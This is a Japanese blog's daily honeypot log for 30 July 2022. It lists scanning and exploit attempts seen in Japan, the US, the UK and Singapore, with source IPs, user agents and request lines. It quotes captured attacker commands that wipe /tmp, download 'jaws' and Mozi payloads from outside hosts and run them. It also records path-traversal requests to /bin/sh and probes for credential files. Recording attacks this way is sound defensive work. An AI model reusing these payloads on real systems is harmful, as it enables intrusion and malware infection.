2022/07/30 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/07/30分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  rischyo.cf/jaws;
sh /tmp/jaws

Location:US

5.188.210.227に関する不正通信

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;
sh /tmp/jaws

Location:SG

D-link製品の脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 2.56.57.238/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget networkmapping.xyz/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：229 (前日比：145)
US：総アクセス数：49 (前日比：-87)
UK：総アクセス数：42 (前日比：-66)
SG：総アクセス数：109 (前日比：34)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.28.87.68	United States
153	13.229.115.217	United States
1	20.124.210.194	United States
1	20.150.210.254	United States
1	20.222.70.43	United States
1	34.203.188.19	United States
1	58.255.210.194	China
1	89.250.82.219	Kazakhstan
1	91.236.239.34	France
16	95.214.235.205	Ukraine
1	107.182.129.137	United States
2	109.237.103.38	Russia
1	113.193.86.134	India
1	125.127.125.68	China
15	135.125.244.48	France
1	147.182.224.91	United States
6	163.123.143.71	United States
1	164.92.85.51	United States
1	172.104.242.173	United States
1	172.105.77.209	United States
1	174.138.61.44	United States
1	176.97.70.37	United Kingdom
2	179.43.155.171	Panama
11	185.7.214.104	Hong Kong
1	188.165.87.104	France
1	188.166.8.119	United States
1	192.241.206.88	United States
1	192.241.216.81	United States
1	205.210.31.11	United States
1	205.210.31.26	United States
1	209.141.51.222	United States

UserAgent一覧

件数	UserAgent
10	`-`
1	`Hello, World`
1	`MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36`
38	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0`
8	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
11	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`Python/3.7 aiohttp/3.7.4.post0`
1	`facebookexternalhit/1.1 (+http[:]//www[.]facebook[.]com/externalhit_uatext.php)`
142	`python-requests/2.28.1`
1	`python-urllib3/1.26.9`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01C\x01`
3		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
40	GET	`/.env`	HTTP/1.1
1	GET	`//.aws/credentials`	HTTP/1.1
1	GET	`//.env.bak`	HTTP/1.1
1	GET	`//.git/config`	HTTP/1.1
1	GET	`//.phpinfo`	HTTP/1.1
1	GET	`//.travis.yml`	HTTP/1.1
1	GET	`//123[.]php`	HTTP/1.1
1	GET	`//?p=info`	HTTP/1.1
1	GET	`//?p=php`	HTTP/1.1
1	GET	`//?phpinfo.php`	HTTP/1.1
1	GET	`//?phpinfo=1`	HTTP/1.1
1	GET	`//?phpinfo`	HTTP/1.1
1	GET	`//?q=info`	HTTP/1.1
1	GET	`//_profiler/phpinfo/info.php`	HTTP/1.1
1	GET	`//_profiler/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`//_profiler/phpinfo`	HTTP/1.1
1	GET	`//`	HTTP/1.1
1	GET	`//a[.]php`	HTTP/1.1
1	GET	`//admin/info.php`	HTTP/1.1
1	GET	`//admin/phpinfo.php`	HTTP/1.1
1	GET	`//adminphp[.]php/configuration.php`	HTTP/1.1
1	GET	`//apache/i.php`	HTTP/1.1
1	GET	`//apache/info.php`	HTTP/1.1
1	GET	`//apache/phpinfo.php`	HTTP/1.1
1	GET	`//apache2[.]php`	HTTP/1.1
1	GET	`//apache[.]php`	HTTP/1.1
1	GET	`//asdf[.]php`	HTTP/1.1
1	GET	`//aws-secret.yaml`	HTTP/1.1
1	GET	`//aws[.]yml`	HTTP/1.1
1	GET	`//build[.]php`	HTTP/1.1
1	GET	`//cache[.]php`	HTTP/1.1
1	GET	`//config/cache.php`	HTTP/1.1
1	GET	`//config[.]js`	HTTP/1.1
1	GET	`//dashboard/i.php`	HTTP/1.1
1	GET	`//dashboard/info.php`	HTTP/1.1
1	GET	`//dashboard/phpinfo.php`	HTTP/1.1
1	GET	`//dashboard/test.php`	HTTP/1.1
1	GET	`//debug/default/view?panel=config`	HTTP/1.1
1	GET	`//dep[.]php`	HTTP/1.1
1	GET	`//deploy[.]php`	HTTP/1.1
2	GET	`//dev[.]php`	HTTP/1.1
1	GET	`//developer[.]php`	HTTP/1.1
1	GET	`//devs[.]php`	HTTP/1.1
1	GET	`//env[.]template`	HTTP/1.1
1	GET	`//frontend_dev[.]php/$`	HTTP/1.1
1	GET	`//i[.]php`	HTTP/1.1
1	GET	`//in[.]php`	HTTP/1.1
1	GET	`//index1[.]php`	HTTP/1.1
1	GET	`//index[.]php`	HTTP/1.1
1	GET	`//inf[.]php`	HTTP/1.1
1	GET	`//info1[.]php`	HTTP/1.1
1	GET	`//info2[.]php`	HTTP/1.1
1	GET	`//info3[.]php`	HTTP/1.1
1	GET	`//info4[.]php`	HTTP/1.1
2	GET	`//info[.]php`	HTTP/1.1
2	GET	`//infophp[.]php`	HTTP/1.1
1	GET	`//infos[.]php`	HTTP/1.1
1	GET	`//ini[.]php`	HTTP/1.1
1	GET	`//isadmin[.]php`	HTTP/1.1
1	GET	`//jo[.]php`	HTTP/1.1
1	GET	`//l[.]php`	HTTP/1.1
1	GET	`//lindex[.]php`	HTTP/1.1
1	GET	`//linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`//main[.]yml`	HTTP/1.1
1	GET	`//new[.]php`	HTTP/1.1
1	GET	`//o[.]php`	HTTP/1.1
1	GET	`//ocp[.]php`	HTTP/1.1
1	GET	`//of[.]php`	HTTP/1.1
1	GET	`//old_phpinfo[.]php`	HTTP/1.1
1	GET	`//p[.]php`	HTTP/1.1
1	GET	`//php-info.php`	HTTP/1.1
1	GET	`//php1[.]php`	HTTP/1.1
1	GET	`//php52/phpinfo.php`	HTTP/1.1
1	GET	`//php[.]ini`	HTTP/1.1
1	GET	`//php[.]php`	HTTP/1.1
1	GET	`//php_info[.]php`	HTTP/1.1
1	GET	`//phpcustom_info/phpinfo.php`	HTTP/1.1
1	GET	`//phpinfo/info.php`	HTTP/1.1
1	GET	`//phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`//phpinfo1[.]php`	HTTP/1.1
1	GET	`//phpinfo2[.]php`	HTTP/1.1
1	GET	`//phpinfo3[.]php`	HTTP/1.1
1	GET	`//phpinfo4[.]php`	HTTP/1.1
1	GET	`//phpinfo[.]html`	HTTP/1.1
1	GET	`//phpinfo[.]php3`	HTTP/1.1
1	GET	`//phpinfo[.]php4`	HTTP/1.1
1	GET	`//phpinfo[.]php5`	HTTP/1.1
2	GET	`//phpinfo[.]php`	HTTP/1.1
1	GET	`//phpinfo[.]txt`	HTTP/1.1
2	GET	`//phpinfo`	HTTP/1.1
1	GET	`//phpinfodev[.]php`	HTTP/1.1
1	GET	`//phpinfos[.]php`	HTTP/1.1
1	GET	`//phpsysinfo/info.php`	HTTP/1.1
1	GET	`//phpsysinfo/phpinfo.php`	HTTP/1.1
1	GET	`//phpsysinfo/phpsysinfo.php`	HTTP/1.1
1	GET	`//phpsysinfo[.]php`	HTTP/1.1
1	GET	`//phpsysinfo`	HTTP/1.1
1	GET	`//phptest[.]php`	HTTP/1.1
1	GET	`//phpversion[.]php`	HTTP/1.1
1	GET	`//pi[.]php5`	HTTP/1.1
1	GET	`//pi[.]php`	HTTP/1.1
1	GET	`//pinfo[.]php`	HTTP/1.1
1	GET	`//q[.]php`	HTTP/1.1
1	GET	`//qq[.]php`	HTTP/1.1
1	GET	`//rest[.]php`	HTTP/1.1
1	GET	`//s3[.]js`	HTTP/1.1
1	GET	`//server/s3.js`	HTTP/1.1
1	GET	`//settings[.]py`	HTTP/1.1
1	GET	`//temp[.]php`	HTTP/1.1
1	GET	`//test123[.]php`	HTTP/1.1
1	GET	`//test1[.]php`	HTTP/1.1
1	GET	`//test1`	HTTP/1.1
1	GET	`//test2[.]php`	HTTP/1.1
1	GET	`//test3[.]php`	HTTP/1.1
1	GET	`//test4[.]php`	HTTP/1.1
1	GET	`//test5[.]php`	HTTP/1.1
1	GET	`//test6[.]php`	HTTP/1.1
1	GET	`//test7[.]php`	HTTP/1.1
1	GET	`//test8[.]php`	HTTP/1.1
1	GET	`//test9[.]php`	HTTP/1.1
1	GET	`//test[.]php`	HTTP/1.1
1	GET	`//test_info1[.]php`	HTTP/1.1
1	GET	`//test_info2[.]php`	HTTP/1.1
1	GET	`//test_info3[.]php`	HTTP/1.1
1	GET	`//test_info4[.]php`	HTTP/1.1
1	GET	`//test_info5[.]php`	HTTP/1.1
1	GET	`//test_info[.]php`	HTTP/1.1
1	GET	`//test_phpinfo1[.]php`	HTTP/1.1
1	GET	`//test_phpinfo2[.]php`	HTTP/1.1
1	GET	`//test_phpinfo3[.]php`	HTTP/1.1
1	GET	`//test_phpinfo4[.]php`	HTTP/1.1
1	GET	`//test_phpinfo5[.]php`	HTTP/1.1
1	GET	`//test_phpinfo[.]php`	HTTP/1.1
1	GET	`//tester[.]php`	HTTP/1.1
1	GET	`//testing[.]php`	HTTP/1.1
1	GET	`//time[.]php`	HTTP/1.1
1	GET	`//token[.]php`	HTTP/1.1
1	GET	`//tz[.]php`	HTTP/1.1
1	GET	`//u[.]php`	HTTP/1.1
1	GET	`//up[.]php`	HTTP/1.1
1	GET	`//w[.]php`	HTTP/1.1
1	GET	`//web[.]php`	HTTP/1.1
1	GET	`//wp-config.old`	HTTP/1.1
1	GET	`//wp-config.php.backup`	HTTP/1.1
1	GET	`//wp-config.php.bak`	HTTP/1.1
1	GET	`//wp-config.txt`	HTTP/1.1
1	GET	`//wp[.]php`	HTTP/1.1
1	GET	`//wpp-config.php~`	HTTP/1.1
1	GET	`//x[.]php`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//58[.]255[.]210[.]194:49035/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws`
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stream?streams=btcusdt@depth`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
8	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/owa`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	20.0.79.186	United States
2	45.227.254.52	Belize
1	51.79.29.48	Canada
4	52.149.148.198	United States
2	80.66.76.110	Russia
1	92.119.177.24	Romania
2	109.237.103.38	Russia
1	162.142.125.210	United States
3	163.123.143.71	United States
1	164.92.85.208	United States
1	172.105.89.161	United States
11	185.7.214.104	Hong Kong
8	185.254.196.223	Ukraine
1	192.241.213.234	United States
2	193.37.69.209	Russia
2	193.56.29.120	United Kingdom
1	198.235.24.22	United States
1	205.210.31.16	United States
1	209.141.35.128	United States
1	212.192.246.208	Czechia
1	223.130.30.59	India

UserAgent一覧

件数	UserAgent
14	`-`
5	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
12	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_34.68.118.83_80\n`
6		`\x03`
1		`\x16\x03\x01\x01C\x01`
2		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
18	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	44.201.18.154	United States
1	95.137.214.103	Georgia
1	103.181.57.133	India
2	109.237.103.38	Russia
1	112.172.136.145	South Korea
1	112.239.66.54	China
1	117.216.18.246	India
1	134.209.46.195	United States
1	162.142.125.8	United States
6	163.123.143.71	United States
1	167.248.133.61	United States
1	172.104.138.223	United States
6	172.105.85.90	United States
1	175.107.13.186	Pakistan
11	185.7.214.104	Hong Kong
1	188.166.8.119	United States
1	192.241.220.69	United States
2	194.165.16.71	Panama
1	198.235.24.26	United States
1	201.140.130.14	Mexico

UserAgent一覧

件数	UserAgent
13	`-`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
2	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
5	`\"Mozilla/5.0`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
1		`\x16\x03\x01\x01C\x01`
1		`\x16\x03\x01`
2	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/nmaplowercheck1659081576`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]181[.]57[.]133:35105/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws`
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
7	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
45	5.39.216.167	Netherlands
1	20.55.53.144	United States
1	47.117.115.239	China
13	51.79.29.48	Canada
1	107.182.129.137	United States
2	109.237.103.9	Russia
1	110.42.215.214	China
1	120.85.112.99	China
1	122.165.245.122	India
1	124.162.128.4	China
1	137.184.33.230	United States
1	147.182.255.203	United States
1	162.142.125.213	United States
1	162.142.125.222	United States
4	163.123.143.71	United States
1	167.94.138.44	United States
1	167.248.133.46	United States
1	172.105.89.161	United States
1	179.92.208.9	Brazil
11	185.7.214.104	Hong Kong
2	185.47.160.222	Hungary
8	185.254.196.223	Ukraine
1	188.166.8.119	United States
1	192.241.220.50	United States
1	192.241.221.44	United States
2	194.165.16.11	Panama
1	203.174.87.98	Singapore
1	205.210.31.8	United States
1	205.210.31.22	United States
1	212.154.7.246	Turkey

UserAgent一覧

件数	UserAgent
16	`-`
1	`Hello, World`
2	`Hello, world`
1	`Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
1	`Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
6	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
1	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
43	`curl/7.54.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
1		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01\x02`
3		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
25	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/JUdY`	HTTP/1.1
1	GET	`/LGupRhAvBNgcmoZUW2KjfeMak66`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/base.jhtml`	HTTP/1.1
1	GET	`/base.jsa`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/default.asp`	HTTP/1.1
1	GET	`/default.cgi`	HTTP/1.1
1	GET	`/default.jhtml`	HTTP/1.1
1	GET	`/default.jsp`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/home.asp`	HTTP/1.1
1	GET	`/home.html`	HTTP/1.1
1	GET	`/home.php`	HTTP/1.1
1	GET	`/index.aspx`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/index.shtml`	HTTP/1.1
1	GET	`/inicio.asp`	HTTP/1.1
1	GET	`/inicio.jhtml`	HTTP/1.1
1	GET	`/inicio.jsa`	HTTP/1.1
1	GET	`/localstart.html`	HTTP/1.1
1	GET	`/main.cfm`	HTTP/1.1
1	GET	`/main.html`	HTTP/1.1
1	GET	`/main.shtml`	HTTP/1.1
1	GET	`/menu.html`	HTTP/1.1
1	GET	`/menu.jhtml`	HTTP/1.1
1	GET	`/menu.php`	HTTP/1.1
1	GET	`/nmaplowercheck1659101124`	HTTP/1.1
2	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/readme.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+2[.]56[.]57[.]238/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/start.cfm`	HTTP/1.1
1	GET	`/start.jsp`	HTTP/1.1
1	GET	`/start.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
6	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
4	PRI	`*`	HTTP/2.0